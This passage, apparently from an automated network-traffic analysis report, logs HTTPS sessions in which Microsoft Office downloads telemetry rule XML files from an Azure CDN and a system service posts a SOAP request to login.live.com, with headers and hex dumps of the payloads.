                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:55 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:55 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                        x-ms-request-id: 0b7a0bcb-d01e-0082-68c5-45e489000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125355Z-1746fd949bddtfvqhC1EWRxbpg000000016g000000004r9p
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:56 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        109192.168.2.74983713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:56 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:56 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                        x-ms-request-id: 76609676-a01e-0070-74cc-45573b000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125356Z-1746fd949bddgsvjhC1EWRum2c00000001m0000000001ga4
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:56 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        110192.168.2.74983813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:56 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:56 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                        x-ms-request-id: 2e27a562-801e-00a0-79cb-452196000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125356Z-1746fd949bdwt8wrhC1EWRu6rg00000001cg000000006mqd
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:56 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        111192.168.2.74983113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:57 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:57 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                        x-ms-request-id: 5bdbb5de-801e-0067-47cb-45fe30000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125357Z-1746fd949bdlqd7fhC1EWR6vt000000001g0000000000uxz
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:57 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        112192.168.2.74984013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:57 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:58 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1352
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                        x-ms-request-id: 88657856-001e-008d-2ccc-45d91e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125358Z-1746fd949bdjzh7thC1EWR3g64000000015g00000000asn8
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        113192.168.2.74983913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:57 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:58 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1389
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                        x-ms-request-id: 1a13e7cb-001e-0049-3bcd-455bd5000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125358Z-1746fd949bdl6zq5hC1EWRf3ws00000000t000000000bp9k
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        114192.168.2.74984313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:58 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                        x-ms-request-id: 4edcd523-801e-0047-60d3-457265000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125358Z-1746fd949bdb8xvchC1EWRmbd4000000011g00000000cymz
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        115192.168.2.74984213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:58 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                        x-ms-request-id: c77b1400-401e-0048-71d2-450409000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125358Z-1746fd949bdb8xvchC1EWRmbd4000000015000000000802k
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        116192.168.2.74984120.190.177.22443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                        Content-Length: 3592
                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                        2024-12-04 12:53:58 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                        2024-12-04 12:53:59 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                        Expires: Wed, 04 Dec 2024 12:52:58 GMT
                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                        x-ms-route-info: C531_SN1
                                                                                                                                                                                                        x-ms-request-id: fc944021-2de3-42a3-8017-05c286f2939c
                                                                                                                                                                                                        PPServer: PPV: 30 H: SN1PEPF0002F0FA V: 0
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:57 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 1276
